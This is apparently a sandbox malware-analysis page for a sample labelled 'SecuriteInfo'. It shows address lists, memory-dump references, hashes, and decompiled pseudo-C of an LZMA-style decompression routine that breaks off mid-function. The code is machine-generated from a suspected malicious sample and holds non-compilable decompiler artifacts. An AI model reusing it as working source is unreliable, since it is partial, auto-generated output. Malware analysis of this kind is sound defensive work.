                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x004073cb
                                                              0x004073cb
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00407489
                                                              0x00407489
                                                              0x00000000
                                                              0x00407489
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb
                                                              0x00000000
                                                              0x00407002

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E0040711C() {
                                                              				unsigned short _t531;
                                                              				signed int _t532;
                                                              				void _t533;
                                                              				signed int _t534;
                                                              				signed int _t535;
                                                              				signed int _t565;
                                                              				signed int _t568;
                                                              				signed int _t589;
                                                              				signed int* _t606;
                                                              				void* _t613;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					if( *(_t613 - 0x40) != 0) {
                                                              						 *(_t613 - 0x84) = 0xb;
                                                              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                              						goto L132;
                                                              					} else {
                                                              						__eax =  *(__ebp - 0x28);
                                                              						L88:
                                                              						 *(__ebp - 0x2c) = __eax;
                                                              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              						L89:
                                                              						__eax =  *(__ebp - 4);
                                                              						 *(__ebp - 0x80) = 0x15;
                                                              						__eax =  *(__ebp - 4) + 0xa68;
                                                              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              						L69:
                                                              						 *(__ebp - 0x84) = 0x12;
                                                              						while(1) {
                                                              							L132:
                                                              							 *(_t613 - 0x54) = _t606;
                                                              							while(1) {
                                                              								L133:
                                                              								_t531 =  *_t606;
                                                              								_t589 = _t531 & 0x0000ffff;
                                                              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                              								if( *(_t613 - 0xc) >= _t565) {
                                                              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                              									 *(_t613 - 0x40) = 1;
                                                              									_t532 = _t531 - (_t531 >> 5);
                                                              									 *_t606 = _t532;
                                                              								} else {
                                                              									 *(_t613 - 0x10) = _t565;
                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                              								}
                                                              								if( *(_t613 - 0x10) >= 0x1000000) {
                                                              									goto L139;
                                                              								}
                                                              								L137:
                                                              								if( *(_t613 - 0x6c) == 0) {
                                                              									 *(_t613 - 0x88) = 5;
                                                              									L170:
                                                              									_t568 = 0x22;
                                                              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                              									_t535 = 0;
                                                              									L172:
                                                              									return _t535;
                                                              								}
                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              								L139:
                                                              								_t533 =  *(_t613 - 0x84);
                                                              								while(1) {
                                                              									 *(_t613 - 0x88) = _t533;
                                                              									while(1) {
                                                              										L1:
                                                              										_t534 =  *(_t613 - 0x88);
                                                              										if(_t534 > 0x1c) {
                                                              											break;
                                                              										}
                                                              										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                              											case 0:
                                                              												if( *(_t613 - 0x6c) == 0) {
                                                              													goto L170;
                                                              												}
                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              												_t534 =  *( *(_t613 - 0x70));
                                                              												if(_t534 > 0xe1) {
                                                              													goto L171;
                                                              												}
                                                              												_t538 = _t534 & 0x000000ff;
                                                              												_push(0x2d);
                                                              												asm("cdq");
                                                              												_pop(_t570);
                                                              												_push(9);
                                                              												_pop(_t571);
                                                              												_t609 = _t538 / _t570;
                                                              												_t540 = _t538 % _t570 & 0x000000ff;
                                                              												asm("cdq");
                                                              												_t604 = _t540 % _t571 & 0x000000ff;
                                                              												 *(_t613 - 0x3c) = _t604;
                                                              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                              												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                              													L10:
                                                              													if(_t612 == 0) {
                                                              														L12:
                                                              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              														goto L15;
                                                              													} else {
                                                              														goto L11;
                                                              													}
                                                              													do {
                                                              														L11:
                                                              														_t612 = _t612 - 1;
                                                              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                              													} while (_t612 != 0);
                                                              													goto L12;
                                                              												}
                                                              												if( *(_t613 - 4) != 0) {
                                                              													GlobalFree( *(_t613 - 4));
                                                              												}
                                                              												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                              												 *(_t613 - 4) = _t534;
                                                              												if(_t534 == 0) {
                                                              													goto L171;
                                                              												} else {
                                                              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                              													goto L10;
                                                              												}
                                                              											case 1:
                                                              												L13:
                                                              												__eflags =  *(_t613 - 0x6c);
                                                              												if( *(_t613 - 0x6c) == 0) {
                                                              													 *(_t613 - 0x88) = 1;
                                                              													goto L170;
                                                              												}
                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                              												_t45 = _t613 - 0x48;
                                                              												 *_t45 =  *(_t613 - 0x48) + 1;
                                                              												__eflags =  *_t45;
                                                              												L15:
                                                              												if( *(_t613 - 0x48) < 4) {
                                                              													goto L13;
                                                              												}
                                                              												_t546 =  *(_t613 - 0x40);
                                                              												if(_t546 ==  *(_t613 - 0x74)) {
                                                              													L20:
                                                              													 *(_t613 - 0x48) = 5;
                                                              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                              													goto L23;
                                                              												}
                                                              												 *(_t613 - 0x74) = _t546;
                                                              												if( *(_t613 - 8) != 0) {
                                                              													GlobalFree( *(_t613 - 8));
                                                              												}
                                                              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                              												 *(_t613 - 8) = _t534;
                                                              												if(_t534 == 0) {
                                                              													goto L171;
                                                              												} else {
                                                              													goto L20;
                                                              												}
                                                              											case 2:
                                                              												L24:
                                                              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                              												 *(_t613 - 0x84) = 6;
                                                              												 *(_t613 - 0x4c) = _t553;
                                                              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                              												L132:
                                                              												 *(_t613 - 0x54) = _t606;
                                                              												goto L133;
                                                              											case 3:
                                                              												L21:
                                                              												__eflags =  *(_t613 - 0x6c);
                                                              												if( *(_t613 - 0x6c) == 0) {
                                                              													 *(_t613 - 0x88) = 3;
                                                              													goto L170;
                                                              												}
                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                              												_t67 = _t613 - 0x70;
                                                              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                              												__eflags =  *_t67;
                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                              												L23:
                                                              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                              												if( *(_t613 - 0x48) != 0) {
                                                              													goto L21;
                                                              												}
                                                              												goto L24;
                                                              											case 4:
                                                              												L133:
                                                              												_t531 =  *_t606;
                                                              												_t589 = _t531 & 0x0000ffff;
                                                              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                              												if( *(_t613 - 0xc) >= _t565) {
                                                              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                              													 *(_t613 - 0x40) = 1;
                                                              													_t532 = _t531 - (_t531 >> 5);
                                                              													 *_t606 = _t532;
                                                              												} else {
                                                              													 *(_t613 - 0x10) = _t565;
                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                              												}
                                                              												if( *(_t613 - 0x10) >= 0x1000000) {
                                                              													goto L139;
                                                              												}
                                                              											case 5:
                                                              												goto L137;
                                                              											case 6:
                                                              												__edx = 0;
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 4);
                                                              													__ecx =  *(__ebp - 0x38);
                                                              													 *(__ebp - 0x34) = 1;
                                                              													 *(__ebp - 0x84) = 7;
                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              													while(1) {
                                                              														L132:
                                                              														 *(_t613 - 0x54) = _t606;
                                                              														goto L133;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              												__esi =  *(__ebp - 0x60);
                                                              												__cl = 8;
                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              												__ecx =  *(__ebp - 0x3c);
                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              												__ecx =  *(__ebp - 4);
                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              												if( *(__ebp - 0x38) >= 4) {
                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                              														_t98 = __ebp - 0x38;
                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                              														__eflags =  *_t98;
                                                              													} else {
                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              													}
                                                              												} else {
                                                              													 *(__ebp - 0x38) = 0;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                              												if( *(__ebp - 0x34) == __edx) {
                                                              													__ebx = 0;
                                                              													__ebx = 1;
                                                              													goto L61;
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x14);
                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                              														__eflags = __eax;
                                                              													}
                                                              													__ecx =  *(__ebp - 8);
                                                              													__ebx = 0;
                                                              													__ebx = 1;
                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              													goto L41;
                                                              												}
                                                              											case 7:
                                                              												__eflags =  *(__ebp - 0x40) - 1;
                                                              												if( *(__ebp - 0x40) != 1) {
                                                              													__eax =  *(__ebp - 0x24);
                                                              													 *(__ebp - 0x80) = 0x16;
                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              													__eax =  *(__ebp - 0x28);
                                                              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              													__eax =  *(__ebp - 0x2c);
                                                              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              													__eax = 0;
                                                              													__eflags =  *(__ebp - 0x38) - 7;
                                                              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              													__al = __al & 0x000000fd;
                                                              													__eax = (__eflags >= 0) - 1 + 0xa;
                                                              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              													__eax =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 4) + 0x664;
                                                              													__eflags = __eax;
                                                              													 *(__ebp - 0x58) = __eax;
                                                              													goto L69;
                                                              												}
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 8;
                                                              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              												while(1) {
                                                              													L132:
                                                              													 *(_t613 - 0x54) = _t606;
                                                              													goto L133;
                                                              												}
                                                              											case 8:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 4);
                                                              													__ecx =  *(__ebp - 0x38);
                                                              													 *(__ebp - 0x84) = 0xa;
                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x38);
                                                              													__ecx =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                              													 *(__ebp - 0x84) = 9;
                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              												}
                                                              												while(1) {
                                                              													L132:
                                                              													 *(_t613 - 0x54) = _t606;
                                                              													goto L133;
                                                              												}
